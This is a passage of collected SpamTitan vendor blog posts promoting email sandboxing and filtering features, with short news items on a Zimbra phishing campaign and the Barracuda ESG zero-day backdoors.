also\r\nsubjected to checks across an extensive array of online repositories, with the sandbox checks taking just a few\r\nminutes. That ensures that genuine emails are not unduly delayed. If malicious properties are detected in the\r\nsandbox, the threat intelligence is passed to Bitdefender’s Global Protective Network (cloud threat intelligence\r\nservice). If the threat is encountered again, it will be detected and blocked without having to be analyzed again in\r\nthe sandbox.\r\nThe SpamTitan sandbox is used for a wide range of attachments, including office documents to check for\r\nmalicious URLs, macros, and scripts, and all executable and application files. The sandbox allows SpamTitan to\r\ndetect polymorphic malware and other threats that have been designed for use in undetectable targeted attacks. If a\r\nmalicious file is detected, the email is not sent to a spam folder where it could be opened by an end user, it is\r\nquarantined in a directory on the local email server which only an administrator can access. Administrators may\r\nwish to conduct further investigations to gain insights into how their organization is being targeted.\r\nThreat actors are conducting increasingly sophisticated attacks, so email security solutions need to be deployed\r\nthat are capable of detecting these advanced threats. With zero-day threats on the rise, now is the ideal time to\r\nimprove your email defenses with SpamTitan. Why not sign up for a free trial of SpamTitan today to put the\r\nsolution to the test to see the difference the advanced threat detection capabilities make to your security posture?\r\nProduct demonstrations can also be requested by contacting TitanHQ, and our friendly sales team will be more\r\nthan happy to discuss SpamTitan with you and the best deployment options to meet the needs of your business.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nEmail Sandboxing Pattern Filtering\r\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 117 of 136\n\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nCommonly Asked Questions About Email Sandboxing\r\nby G Hunt | September 15, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nCommonly asked questions about email sandboxing so you know what to expect from an email security solution\r\nwith a sandbox, and why this advanced feature is vital for email security.\r\nWhat is an Email Sandbox?\r\nOne of the commonly asked questions about email sandboxing is what is an email sandbox? Like the children’s\r\nequivalent, it is a safe space for building, destroying, and experimenting. In cybersecurity terms, it is an isolated\r\nenvironment where harm cannot be caused to anything outside of that environment. An email sandbox is an\r\nisolated virtual machine that is used for performing risky actions, such as opening unknown attachments and\r\nanalyzing files and URLs in depth, rather than using a real machine where there is a risk of harm being caused\r\nsuch as file encryption by ransomware, theft of sensitive information, or wiping of data.\r\nWhy is an Email Sandbox Important?\r\nEmail is the most common vector used in cyberattacks. Through emails, cyber threat actors can gain initial access\r\nto a protected network from where they can steal sensitive data or move laterally for a more comprehensive attack.\r\nOne of the most common ways of gaining remote access is through malware. Once malware is downloaded, an\r\nattacker can remotely perform commands and gain full control of an infected device. While businesses use\r\nantivirus software to detect and remove malware, these solutions are signature-based. In order to detect malware,\r\nthe signature of the malware must be in the definition list used by the anti-virus solution, which means the\r\nmalware must have previously been encountered. Novel malware variants that have not yet been determined to be\r\nmalicious will not be identified as such and will therefore be delivered to inboxes where they can be executed by\r\nemployees. An email sandbox is used to safely detonate suspicious files and inspect their behaviors. The\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 118 of 136\n\nbehavioral analysis allows previously unknown malware samples can be identified and blocked. This is important\r\ndue to the volume of new malware samples that are now being released.\r\nHow Does an Email Sandbox Protect Against Malware?\r\nEmail security solutions with sandboxing perform the same front-end checks as traditional email security\r\nsolutions and will identify and block many malicious messages. If the initial checks are passed, and the messages\r\nare determined to potentially pose a risk, they will be sent to the sandbox for behavioral analysis. Once inside the\r\nsafety of the sandbox, the attachments will be opened and subjected to various tests. The sandbox is configured to\r\nappear to be a normal endpoint, so any malware will be tricked into running malicious commands as it would if it\r\nhad reached its intended target. The actions of the file are assessed, and if they are determined to be malicious they\r\nwill be sent to a quarantine folder. By performing these checks, new malware variants can be identified and\r\nblocked before any harm is caused.\r\nWill Sandboxing Delay Message Delivery?\r\nPerforming standard checks of messages is a quick process, often causing imperceptible delays in mail delivery.\r\nPerforming in-depth analysis takes longer, so there will be a delay in message delivery. Many emails will not need\r\nto be sent to the sandbox and will be delivered immediately, but if sandboxing is required, there will be a delay\r\nwhile the behaviors of the email and attachments are analyzed. Some malware has built-in anti-analysis\r\ncapabilities and will delay any malicious processes to combat sandboxing. Time is therefore required to ensure full\r\nanalysis. With SpamTitan, the delay will be no longer than 20 minutes.\r\nHow Can I Avoid Message Delivery Delays?\r\nSpamTitan incorporates artificial intelligence and machine learning capabilities which minimize the number of\r\nemails that are sent to the sandbox, and SpamTitan will check every 15 seconds to ensure that emails are delivered\r\nas soon as the sandbox analysis is complete. SpamTitan’s sandbox is part of Bitdefender’s Global Protective\r\nNetwork, which ensures rapid checks of suspicious messages. To avoid delays, certain email addresses and\r\ndomains can be added to a whitelist, which means they will not be sent to the sandbox for analysis, ensuring rapid\r\ndelivery.\r\nWhat are the Benefits of Email Sandboxing?\r\nThe sandbox provides an important extra layer of protection against malware threats and malicious links. It will\r\ndetect advanced attacks early and prevent breaches, reduce incident response costs and efforts, reduce the threat-hunting burden, and increase the detection rate of elusive threats in the pre-execution stage, including APTs,\r\ntargeted attacks, evasion techniques, obfuscated malware, custom malware, ransomware.\r\nHow Does the SpamTitan Sandbox Work?\r\nSpamTitan will subject all inbound emails to a battery of front-end tests, and if these are passed but the email is\r\nstill suspicious, the message and attachment will be sent to the sandbox and the user will be informed that the\r\nmessage is in the sandbox for review. The email and attachments will then be opened in an isolated cloud platform\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 119 of 136\n\nor a secure customer virtual environment. If malware is detected, the email is blocked and assigned ATP.Sandbox\r\nand will be listed under “Viruses” in the relevant quarantine report and the intelligence gathered will be used to\r\nprotect all users from that threat in the future. After twenty minutes of interrogation, if no malicious actions are\r\nidentified, the file is marked clean and the email is passed onto the recipient.\r\nHow Can I Find Out More About Email Security and Sandboxing?\r\nIf you have unacceptable numbers of spam and malicious messages being delivered to inboxes, are receiving large\r\nnumbers of queries about suspicious emails from your employees, or if you have experienced a malware infection\r\nvia email recently, you should speak with TitanHQ about improving email security with SpamTitan.\r\nSpamTitan has artificial intelligence and machine learning capabilities, a next-gen email sandbox, and a 99.99%\r\ndetection rate with a very low false positive rate. Further, SpamTitan is very competitively priced, easy to use, and\r\nrequires little maintenance. The solution is also available on a 100% free trial, with full product support provided\r\nfor the duration of the trial.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nEmail Sandboxing Pattern Filtering\r\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 120 of 136\n\nTitanHQ Announces New Partnership with India’s Leading Managed Service\r\nProvider\r\nby G Hunt | September 13, 2023 | Industry News\r\nTitanHQ has recently announced a new partnership with one of India’s leading managed service providers, Tata\r\nTele Business Services (TTBS). TTBS is the leading provider of business connectivity and communications\r\nsolutions in India and has the largest portfolio of ICT services for businesses in the country.\r\nLike many countries, India is facing a major increase in cybercrime. 78% of Indian organizations experienced a\r\nransomware attack in 2021, web-based attacks have jumped sharply, and a 2022 Group-IB study placed India third\r\nglobally for phishing attacks in 2021 with more attacks than any other country in the Asia-Pacific region. Indian\r\nbusinesses need to ensure that they have the necessary defenses in place to combat increasingly sophisticated\r\ncyberattacks, especially attacks that target employees.\r\nBusinesses often turn to their managed service providers for cybersecurity and seek solutions that can protect\r\nthem against malware and phishing. TTBS provides cybersecurity solutions to SMBs and its cybersecurity\r\npackages have now been improved with the addition of SpamTitan email security and the WebTitan DNS-based\r\nweb filter. Both solutions are 100% cloud-based, easy for MSPs to add to their service stacks, and easy to manage.\r\nTTBS provides advanced email security with phishing protection through the Tata Tele Email Security Plus\r\nProgram, which delivers advanced threat protection for email through TitanHQ’s AI-driven SpamTitan anti-phishing solution. Protection against Internet-based threats is provided through the Tata Tele Smart Internet\r\nProgram, which includes web filtering provided by WebTitan. WebTitan is fed threat intelligence from a network\r\nof 650 million endpoints, ensuring malicious websites are blocked before threats are encountered.\r\n“We are delighted to partner TitanHQ to offer Tata Tele Email Security- an advanced email security solution that\r\nis in line with Zero Trust security agenda of enterprises,” said Vishal Rally, Sr. VP \u0026 Head – Product, Marketing\r\nand Commercial, Tata Teleservices Ltd. “As a leading technology enabler TTBS is committed to simplifying and\r\ndemocratizing email security for businesses of any size. This partnership will ensure the protection of enterprise\r\nsensitive data efficiently and cost effectively”.\r\n“We are excited to partner with Tata Teleservices to offer their growing customer base our advanced\r\nthreat protection layer for email and web security,” said TitanHQ CEO, Ronan Kavanagh. “Over several years\r\nTata Teleservices has excelled in the areas of customer service and security, our partnership further cements this\r\ncommitment”.\r\nIf you are an MSP that has yet to start offering cybersecurity packages to your clients, or if you are keen to\r\nimprove protection through AI-driven cybersecurity solutions, give the TitanHQ channel team a call to find out\r\nmore about how TitanHQ can help you better protect your clients and improve your profits.\r\nEmail Sandboxing and Message Delivery Delays\r\nby G Hunt | September 10, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 121 of 136\n\nEmail sandboxing is important for security, as it will block threats that traditional email filters fail to detect. While\r\nsandboxing is now considered to be an essential element of email security, one disadvantage is that it will delay\r\nthe delivery of emails. In this post, we will explain why that is and how email delivery delays can be minimized or\r\navoided altogether.\r\nWhat Does Queued for Sandbox Mean?\r\nIf you use SpamTitan or another email security solution with email sandboxing, you may see the message “email\r\nqueued for sandbox” from time to time. The queued for sandbox meaning is the message has been determined to\r\nwarrant further inspection and it has been sent to the sandbox for deeper analysis. This is most likely because the\r\nemail includes an attachment that is determined to be risky, even though it has passed the initial antivirus scans.\r\nWhile email sandboxing is important for security, there is a downside, and that is processing messages in a\r\nsandbox and conducting behavioral inspection takes a little time. That means there will be a delay in delivering\r\nmessages that have been sandboxed while behavioral checks are performed. Messages will only be delivered once\r\nall sandbox checks have been passed. If a large volume of suspicious emails are received at the same time,\r\nmessages will be queued for analysis, hence the queued for sandbox message being displayed.\r\nSandbox Delays for Inbound Emails\r\nThe processing of messages in a sandbox can take a little time. Cyber threat actors do not want their malware and\r\nmalicious code analyzed in a sandbox, as it will allow their malware to be identified. Further, once a malware\r\nsample has been identified, details will be shared with all other users of that security solution, which means no\r\nuser will have that malicious file delivered to their inbox. SpamTitan’s email sandbox is powered by Bitdefender,\r\nso all members of the Bitdefender network who subscribe to its feeds will also be protected.\r\nMany malware samples now have anti-sandbox technologies to prevent this. When the malware is dropped on a\r\ndevice it will analyze the environment it is in before launching any malicious actions. If it senses it is in a sandbox\r\nit will terminate and may attempt to self-delete to prevent analysis. One technique often seen is delaying any\r\nmalicious processes for a set time after the payload is delivered. Many sandboxes will only analyze files for a\r\nshort period, and the delay may be sufficient to trick the sandbox into releasing the file. It is therefore necessary to\r\ngive the sandbox sufficient time for a full analysis.\r\nAre Your Sandbox Delays Too Long?\r\nConducting analyses of emails in a sandbox is resource-intensive and can take several minutes and there may be\r\ndelays to email delivery that are too long for some businesses. There are ways to avoid this, which we will discuss\r\nnext, but it may be due to the email security solution you are using. The SpamTitan email sandbox is part of\r\nBitdefender’s Global Protective Network, which was chosen not only for cutting-edge threat detection but also the\r\nspeed of analysis. If you are experiencing long delays receiving emails, you should take advantage of the free trial\r\nof SpamTitan to see the difference the solution makes to the speed of email delivery for emails that require\r\nsandbox analysis.\r\nHow the SpamTitan Sandbox for Email Minimizes Delays\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 122 of 136\n\nSpamTitan does not send all messages to the sandbox to avoid unnecessary email delays. If a message is\r\nsuspicious and the decision is taken to send it to the sandbox for analysis, SpamTitan will check to see if the\r\nanalysis has been completed every 15 seconds to ensure it is released in the shortest possible time frame.\r\nEmployees will be aware that they have received a message that has been sent to the sandbox as the message\r\ndelivery status is displayed in their history. Provided all sandbox checks are passed, the email will be delivered.\r\nThis process will take no longer than 20 minutes. If a file is determined to be legitimate, details are retained by\r\nSpamTitan so if the attachment or message is encountered again, it will not be subjected to further analysis in the\r\nsandbox.\r\nHow to Avoid Sandbox Delays to Message Delivery\r\nThere are ways to avoid messages being placed in the queue for sandbox inspection. While it is not always\r\nadvisable for security reasons, it is possible to whitelist specific email addresses and domains. This will ensure\r\nthat emails from important clients that need a rapid response will be delivered without delay and will not be sent\r\nto the sandbox. The problem with this approach is that if a whitelisted email address or a domain is compromised\r\nand used to send malicious messages, they will be delivered.\r\nWhat Happens if a Message is Misclassified as Malicious?\r\nFalse positives do occur with spam and phishing emails as email filtering is not an exact science. While this is rare\r\nwith SpamTitan, any misclassified emails will not be deleted as they will be sent to a quarantine folder. That\r\nfolder can be configured to be accessible only by an administrator. The administrator can then check the validity\r\nof the quarantined messages and release any false positives. Since SpamTitan has artificial intelligence and\r\nmachine learning capabilities, it will learn from any false positives, thus reducing the false positive rate in the\r\nfuture.\r\nTalk with TitanHQ About Improving Email Security\r\nIf you are not currently using an email security solution with sandboxing or if your current email security solution\r\nis not AI-driven, contact TitanHQ to find out more about how SpamTitan can improve protection against\r\nsophisticated email threats. SpamTitan is available on a free trial to allow you to put the product to the test before\r\ndeciding on a purchase, and product demonstrations can be arranged on request. If you proceed with a purchase,\r\nyou will also benefit from TitanHQ’s industry-leading customer service. If you ever have a problem or a query,\r\nhelp is rapidly at hand.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nEmail Sandboxing Pattern Filtering\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 123 of 136\n\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nHow Does an Email Sandbox Block Malware?\r\nby G Hunt | September 5, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nYou may have heard that email sandboxing is an important security feature, but how does an email sandbox block\r\nmalware and why is this security feature necessary? In this post, we explain what an email sandbox is, why it is\r\nnow an important element of email security, and how email sandboxes work.\r\nAn email sandbox is a secure and isolated environment where emails and their attachments are subjected to\r\nbehavioral analysis. In the sandbox, malicious files and code can be safely detonated where no harm can be\r\ncaused. Say an email is received that contains malicious code that is used to drop and execute ransomware on a\r\ndevice. Executing that code on a standard machine would initiate the process that ends with file encryption.\r\nExecute that code in an email sandbox and the malicious behavior would be detected and no harm would be\r\ncaused. The email and code will then be eradicated from the email system, and the threat intelligence gathered will\r\nbe sent to a global network to ensure that if the email or code is encountered again it will be immediately blocked.\r\nMany Email Security Solutions Fail to Detect the Most Serious Threats\r\nTraditional email security solutions perform many tests on emails to determine the likelihood of them being spam\r\nor malicious. DMARC and SPF are used to check the legitimacy of the sender, checks are performed on the\r\nreputation of an IP address/domain, and the subject, title, and body of a message are analyzed for signs of phishing\r\nand spam. Email attachments are also subject to anti-virus checks, which will identify and block all known\r\nmalware variants. The result? Filtered emails contain no known spam, no known malicious hyperlinks, and no\r\nknown malware.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 124 of 136\n\nThe problem with traditional email security solutions is they are unable to detect unknown spam, phishing\r\nattempts, and malware. If a threat actor uses a previously unseen phishing email, which includes either a link to a\r\nfresh URL or a site with a good reputation, that email will most likely be delivered. If a new malware variant is\r\nsent via email, its signature will not be present in any virus or malware definition list and will similarly be\r\ndelivered to an end user’s inbox. Threat intelligence is shared with email security solutions and they are constantly\r\nupdated as new threats are found but there is a lag, during which time these threats will be delivered to inboxes.\r\nThat is why an email sandbox is needed.\r\nHow an Email Sandbox Works\r\nAntivirus scans will block the majority of malware, but not novel (zero-day) malware threats. When an email\r\nsecurity solution has email sandboxing, the same checks are initially performed, and if they are passed, emails are\r\nsent to the sandbox for further analysis. The email sandbox is an isolated environment on a virtual machine that is\r\nconfigured to look like a genuine endpoint. As far as the threat actor is concerned, their email will have reached\r\ntheir intended target and the file should execute as it would on a standard machine.\r\nIn the sandbox, emails and attachments are opened and links are followed and behavior is analyzed in detail to\r\ndetermine if any malicious or suspicious actions occur such as a command-and-control center callbacks, attempted\r\nfile encryption, or scans for running processes. If a Word document is opened that contains no hyperlinks, no\r\nmacros, and no malicious scripts, and nothing suspicious occurs in the time it is present in the sandbox, the file\r\nwill be determined as benign and the email will then be delivered to the intended recipient. If any malicious\r\nactions are detected, the file will be sent to a local quarantine directory where it can only be accessed by the\r\nadministrator. The intelligence gathered will be sent to the global network and all users will be protected almost\r\ninstantly. All copies of that message and the attachment will also be removed from the entire mail system.\r\nEmail Sandboxing and AI-Driven Threat Detection are Now Vital\r\nEmail sandboxing is now vital for email security as new malware variants are being released at an incredible rate\r\nand signature-based detection methods cannot detect new malware threats. In addition to email sandboxing,\r\nartificial intelligence must be leveraged to look for novel phishing messages, as phishing attempts are also\r\nincreasing in sophistication. These AI-based checks look for messages that deviate from the typical messages\r\nreceived by a company, and greatly reduce the volume of spam and phishing emails that reach inboxes.\r\nThe threat landscape is constantly changing so advanced email defenses are now essential. If you are still using an\r\nemail security solution without email sandboxing and AI-driven threat detection, your company is at risk. Speak to\r\nthe team at TitanHQ to find out more about SpamTitan and how the award-winning email security solution can\r\nenhance your company’s security posture.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 125 of 136\n\nEmail Sandboxing Pattern Filtering\r\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nEmail Sandboxing, Pattern Filtering, and Other Much-Loved SpamTitan Features\r\nby G Hunt | September 1, 2023 | Network Security, Spam Software\r\nSpamTitan is a next-generation anti-spam, anti-phishing, and anti-malware solution for businesses that\r\nincorporates AI-based threat detection, email sandboxing, and many other advanced email security features. Some\r\nof the most important and best-loved features of SpamTitan are explained below:\r\nEmail Sandboxing in SpamTitan\r\nEmail sandboxing is a vital element of email security, yet many email security solutions lack this feature. An email\r\nsandbox is a secure, virtual machine where links can be followed and attachments opened where they cannot cause\r\nany harm. A malicious link that leads to an automatic malware download can be followed in safety, and even the\r\nnastiest piece of malware can be executed without risk as the sandbox is isolated, not connected to any network,\r\nand contains no real data.\r\nThe sandbox is configured to appear to be a genuine endpoint in order to trick malicious actors into thinking\r\nmalware has reached its intended target. When a file is opened in the sandbox it is subject to deep analysis, and\r\nany malicious or suspicious actions are detected. Emails are subject to a battery of front-end checks, including\r\nscans using two anti-virus engines, and any emails that pass these checks but are determined to potentially pose a\r\nrisk are sent to the sandbox for behavioral analysis. That includes emails along with any attached documents,\r\nspreadsheets, and executable files.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 126 of 136\n\nSandboxing for email is important because of the speed at which novel malware samples are used in attacks.\r\nRather than just use one version of a keylogger in a campaign, a threat actor will use dozens of versions of that\r\nkeylogger, each differing slightly to evade signature-based detection mechanisms. AI and automation are used by\r\nthreat actors to churn out new malware variants rapidly, and signature-based detection alone is no longer good\r\nenough. With sandboxing, email protection is greatly improved against these zero-day threats which would\r\notherwise be delivered to end users’ inboxes.\r\nPattern Filtering in SpamTitan\r\nOne of the most loved features of SpamTitan is Pattern Filtering. It saves IT security teams a considerable amount\r\nof their precious time by ensuring spammy and phishy emails are not delivered. The Pattern Filtering feature\r\nallows administrators to use their own terminology to block inbound emails. Simply set a word or phrase through\r\nPattern Filtering, and SpamTitan will search the subject line and message body and can be configured to generate\r\na warning or quarantine the email if the word or phrase is found.\r\nAn example of where this can be useful is combating the Nigerian scam/419 fraud, a type of advanced fee fraud.\r\nThe 419 comes from Section 419 of the Nigerian Criminal Code which prohibits this kind of scam. While the\r\nscam is common with Nigerian cybercriminals, cybercriminal groups in many different countries also conduct this\r\ntype of scam. While the themes of the emails vary, they all have the same aim. An example would be a prominent\r\nperson who has substantial funds in their account has been unable to transfer the funds out of the country due to\r\nunfair restrictions. They offer to transfer these funds to the user’s account to get the money out of the country in\r\nexchange for a percentage of those funds as payment, which may be as high as 20%, which is a life-changing\r\namount of money. The catch? In order to proceed, charges need to be covered and they must be paid in advance.\r\nThe Pattern Filtering option can be used to block these emails by incorporating phrases commonly used in these\r\nemails.\r\nGeo-Filtering in SpamTitan\r\nSpamTitan also incorporates geo-filtering, which allows users to block emails from specific countries. If you\r\nnever do business with countries in Africa, for example, you can simply block all emails coming from African IP\r\naddresses with a few clicks of a mouse, rather than manually blocking IP addresses from which you get a lot of\r\nspam emails. This feature saves IT teams a considerable amount of time. One user who has benefited greatly from\r\nthis feature is Benjamin Jeffrey, IT manager at M\u0026M Golf Cars. His company was receiving many requests from\r\ncountries that the company does not do business with and was getting flooded with spam emails from a specific IP\r\nsubnet in a country. He configured the geo-filtering and instantly blocked all those messages. When he checked 6\r\nmonths after configuring that feature, around 12,000 emails had been blocked. Geo-blocking is also useful for\r\nblocking malware quickly. Malware distribution campaigns are often launched from a handful of countries, and\r\ngeo-filtering can be used to block those messages with ease.\r\nAI and Machine Learning in SpamTitan\r\nSpamTitan has AI and machine learning capabilities to improve the detection of spam and phishing emails. These\r\ntechnologies learn about the emails that are typically received by a company and create a baseline against which\r\nnew emails can be measured. When emails deviate from the norms, they are flagged as risky and are subjected to\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 127 of 136\n\nmore stringent security checks or are quarantined for manual inspection. These technologies greatly improve spam\r\nand phishing email catch rates and allow SpamTitan to improve day-by-day. These technologies are a vital defense\r\nagainst zero-day phishing threats – new threats that have not been encountered on the 500+ million endpoints\r\nfrom which threat intelligence is gathered.\r\nFind out More About SpamTitan\r\nThese are just some of the most loved and most beneficial features of SpamTitan. In addition to having a high\r\ncatch-rate and low false positive rate, SpamTitan is one of the most affordable email security solutions on the\r\nmarket, it’s quick and easy to set up, and requires little maintenance. The features, price, and ease of use are why it\r\nis loved by thousands of small- and medium-sized businesses, enterprises, and managed service providers. To find\r\nout more, give the TitanHQ team a call. The product is available on a 100% free trial if you want to put it to the\r\ntest, and product demonstrations can be arranged on request.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nEmail Sandboxing Pattern Filtering\r\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 128 of 136\n\nSimple, Yet Effective Phishing Campaign Targets Zimbra Collaboration\r\nCredentials\r\nby G Hunt | August 23, 2023 | Phishing \u0026 Email Spam\r\nPhishing campaigns do not need to be especially sophisticated to be effective, as a recently identified campaign\r\nthat targets Zimbra Collaboration credentials clearly demonstrates. Zimbra Collaboration, previously known as\r\nZimbra Collaboration Suite, is a software suite that includes an email server and web client. Zimbra Collaboration\r\nemail servers are targeted by a range of different threat actors, including state-sponsored hackers and\r\ncybercriminals for espionage, conducting phishing attacks, and gaining a foothold that can be used for a more\r\nextensive compromise of an organization.\r\nThis global campaign targets users’ credentials and does not appear to be targeted on any specific sector and the\r\nthreat actor behind the campaign and their motives are not known. The highest number of attacks have occurred in\r\nPoland, Ecuador, and Italy. Like many phishing campaigns, the emails warn users about a security update, security\r\nissue, or pending account deactivation, and the emails appear to have been sent from an email server\r\nadministrator.\r\nThe emails include an HTML attachment, which is opened as a locally hosted page in the user’s browser. The\r\nHTML file displays a Zimbra login prompt that is tailored for each organization and includes their logo and name,\r\nand the targeted user’s username is prefilled. If the user enters their password, the credentials are transmitted to\r\nthe attacker’s server via an HTTPS POST request.\r\nThe campaign was identified by security researchers at ESET, who observed waves of phishing emails being sent\r\nfrom companies that had previously been targeted, which suggests that some of the attacks have allowed the threat\r\nactor to compromise administrator credentials and set up new mailboxes to target other organizations.\r\nDespite the simplicity of the campaign, it has proven to be very effective, even though the login prompt in the\r\nHTTP file differs considerably from the genuine Zimbra login prompt, and the page is opened locally, which\r\nsuggests a lack of security awareness training due to the failure to identify the red flags in the emails. The emails\r\nare also likely to have a low detection rate by email security solutions, as the only malicious element is a single\r\nlink to a malicious host, which is within the HTML file rather than the email body,\r\nPhishing remains one of the most effective ways for hackers to gain initial access to networks. Combatting\r\nphishing attacks requires a combination of measures. A spam filter such as SpamTitan should be used to block the\r\nemails and prevent them from reaching their intended targets. SpamTitan incorporates signature-based and\r\nbehavioral detection mechanisms for identifying malware, link scanning, and reputational checks to ensure a high\r\ncatch rate and low false positive rate.\r\nNo spam filtering solution will be able to block all malicious emails without also having an unacceptably high\r\nfalse positive rate, so it is important to also provide regular security awareness training to employees to teach them\r\nhow to recognize and avoid malicious emails. Security awareness training should also incorporate phishing\r\nsimulations to give employees practice at identifying threats. If a threat is not detected, it can be turned into a\r\ntraining opportunity. TitanHQ’s security awareness training platform – SafeTitan – delivers instant training in\r\nresponse to a failed phishing simulation, and also delivers training in response to other security mistakes, ensuring\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 129 of 136\n\ntraining is provided when it has the greatest impact. Training data shows that SafeTitan reduces employee\r\nsusceptibility to phishing attacks by up to 80%, and combined with SpamTitan email security, ensures that\r\nbusinesses are well protected from phishing attacks and other cyber threats.\r\nSpamTitan and SafeTitan, like all TitanHQ solutions are available on a free trial and product demonstrations can\r\nbe arranged on request.\r\nNew Backdoor Malware Variants Deployed on Barracuda ESG Appliances\r\nby G Hunt | July 31, 2023 | Email Scams\r\nA zero-day vulnerability in Barracuda email security gateway (ESG) appliances was exploited to deliver three\r\nmalware variants onto the devices. These previously unknown malware variants have been dubbed SeaSide,\r\nSaltwater, and Seaspy, with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently reporting\r\nthat an additional malware backdoor dubbed Submarine was also deployed. In the attacks.\r\nInitially, Saltwater malware – a trojanized Barracuda SMTP daemon – was used and allowed the threat actor to\r\nperform several actions such as steal files, run shell commands remotely, and proxy traffic to evade intrusion\r\ndetection systems. SeaSpy malware was deployed to provide persistence and monitor SMTP traffic, and SeaSide\r\nmalware was used to establish reverse shells and connect with the attacker’s command-and-control server, which\r\nallowed remote code execution via SMTP HELO/EHLO messages and provided the attacker with complete\r\ncontrol of the appliances, allowing additional malware payloads to be delivered.\r\nAccording to CISA, “SUBMARINE is a novel persistent backdoor that lives in a Structured Query Language\r\n(SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts that, in a multi-step process,\r\nenable execution with root privileges, persistence, command and control, and cleanup.”\r\nThe zero-day vulnerability in the Barracuda ESG is tracked as CVE-2023-2868 and is a remote command\r\ninjection vulnerability, a patch for which has now been released. The vulnerability could be exploited remotely by\r\na threat actor with a malicious email message – an email with a specially crafted .tar file attachment that\r\nmasqueraded as a harmless .jpeg or .dat file. The attachment was used to exploit the vulnerability and gain access\r\nto ESG appliances.\r\nThe exploits of the vulnerability have been linked with a pro-China hacking group tracked as UNC4841, which\r\nwas discovered to have conducted a series of attacks in May, although CISA reports that the threat actor may have\r\nbeen exploiting the vulnerability undetected since as early as October 2022 to gain access to ESG appliances and\r\nsteal data.\r\nWith access to ESG appliances, the threat actor was free to remotely execute code for months. The ESG\r\nappliances are used across the public and private sectors, including government organizations, so the\r\ncompromising of the appliances since October 2022 is of particular concern, as the threat actor may have been\r\nable to steal sensitive data for several months undetected. Many large companies also use Barracuda’s ESG\r\nappliances including Delta Airlines, Kraft Heinz, Samsung, and Mitsubishi, all of which were affected.\r\nWhile the vulnerability has been patched, UNC4841 has proven to be very persistent, switching its persistence\r\nmechanisms when the attacks were detected. Indicators of Compromise and MD5 